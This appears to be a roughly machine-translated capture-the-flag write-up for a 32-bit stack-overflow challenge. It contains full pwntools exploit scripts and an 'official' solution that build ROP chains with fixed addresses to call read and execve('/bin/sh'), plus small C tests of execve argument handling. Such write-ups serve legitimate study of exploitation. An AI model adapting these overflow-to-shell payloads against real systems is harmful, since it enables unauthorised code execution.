nep 2022 cat

I looked at it while fishing
Set up first execve Parameters of
To write execve Of gadget
recycling add esp 0x20 This gadget Replace the commonly used pop 3 reg
As long as you notice the stack lifting operation at the beginning of the function, everything is fine …

ret 			= 0x08048127 
sys_write		= 0x08048110
sys_read		= 0x080480F0
aGoodLuck		= 0x0804B000
addr 			= 0x0804B000 + 0x500 # binsh's addr
r_w 			= 0x08048130
add_esp_20__ret = 0x08048190
start 			= 0x080481A0
execve 			= 0x08048115
def exp(i):
	pl = 0x10 * b'a' + p32(sys_read) + p32(start) 
	pl+= p32(0) + p32(addr) + p32(len("/bin/sh"))
	pl+= p32(addr) + p32(0) + p32(0) # addr store "binsh"'s' addr

	gdb.attach(p)	
	se(pl)
	ri()
	se(b"/bin/sh")

	pl = 0x10 * b'a' + p32(start)
	pl+= p32(0)*5 +  p32(execve) 

	# gdb.attach(p)
	ri()
	se(pl)


	pl = 0x10*b'a' + p32(sys_write) + p32(add_esp_20__ret)
	pl+= p32(1) + p32(aGoodLuck) + p32(11)
	ri()
	se(pl)


if __name__=="__main__":
	exp(1)
	ir()

Official interpretation

from pwn import*
p=process('./main')
sys_read = 0x080480f0
sys_execve = 0x08048115
binsh = 0x0804B000+0x200 # anywhere in data section
payload  = b"b"*0x10 + p32(sys_read) + p32(sys_execve) + p32(0) + p32(binsh)
payload += p32(binsh + 7) + p32(0) * 3 + b"\x00\x00"# 50 byte overflow
payload += b"/bin/sh\x00" + b"\x00" * 3 # 11 byte
# gdb.attach(p)
p.send(payload)
p.interactive()

I saw the official wp Just know that you can play like this
Send all data at once Anyway, it's also in the buffer There is no need to send it twice
most important of all execve
Usually it is necessary to construct execve('/bin/sh',NULL,NULL)
But here is execve('/bin/sh',ptr,NULL); *ptr = NULL

Practice has proved execve perform binsh Not necessarily two NULL

#include <stdio.h>
#include <stdlib.h>
int
main(int argc, char ** argv){
    

	printf("Hello \n");
	void *ptr = NULL;
	ptr = "squ";
   execve("/bin/sh", (char * const*)&ptr, 0);
}

But if argv There are two non NULL Parameter time There will be problems

#include <stdio.h>
#include <stdlib.h>
int
main(int argc, char ** argv){
    
	printf("Hello \n");
	char * const* ptr = NULL;
	char * p[] = {
    
		"squ",
		// "irrel",  You can't get it without the notes shell  And if you comment it out, you can get shell
		NULL
	};
	ptr = p;
	    execve("/bin/sh", ptr,  ptr);
}

Take an example

#include <stdio.h>
#include <stdlib.h>
int
main(){
    ;

	printf("Hello \n");
	char * const argv[] = {
    
		"Yoiko",
		"-al",
		"/etc/passwd",
		NULL,
	};
	char * envp[] = {
    
		"squ",
		"irrel",
		NULL
	};
	execve("/bin/ls", argv, NULL);
}

Normally speaking argv The first parameter of should be the name of the task being executed （ conventional
Here, it is deliberately replaced by irrelevant orders Because you can't use

	char * const argv[] = {
    
		"Yoiko",
		"-al",
		"/etc/passwd",
		NULL,
	};

therefore execve("/bin/sh",argv,envp) In extreme cases argv The array pointed to can have a member This member is not used It doesn't matter
But no more than two Because the second one is about to be executed however sh No parameters

But it is difficult to find a secondary pointer for this problem
So you just need to argv and envp All the pointers point to NULL that will do You don't need to set all NULL It's much more convenient to solve this problem in this way
（ A big man said before execve Of argv and envp Both are needed NULL Let me believe it Sure enough, practice produces true knowledge ）

from pwn import*
p=process('./main')
sys_read = 0x080480f0
sys_execve = 0x08048115
binsh = 0x0804B000+0x200 # anywhere in data section
gGoodLuck = 0x0804B000
payload  = b"b"*0x10 + p32(sys_read) + p32(sys_execve) + p32(0) + p32(binsh)
payload += p32(binsh + 7) + p32(binsh + 7) + p32(0) * 2 + b"\x00\x00"# 50 byte overflow
payload += b"/bin/sh\x00" + b"\x00" * 3 # 11 byte
# gdb.attach(p)
p.send(payload)
p.interactive()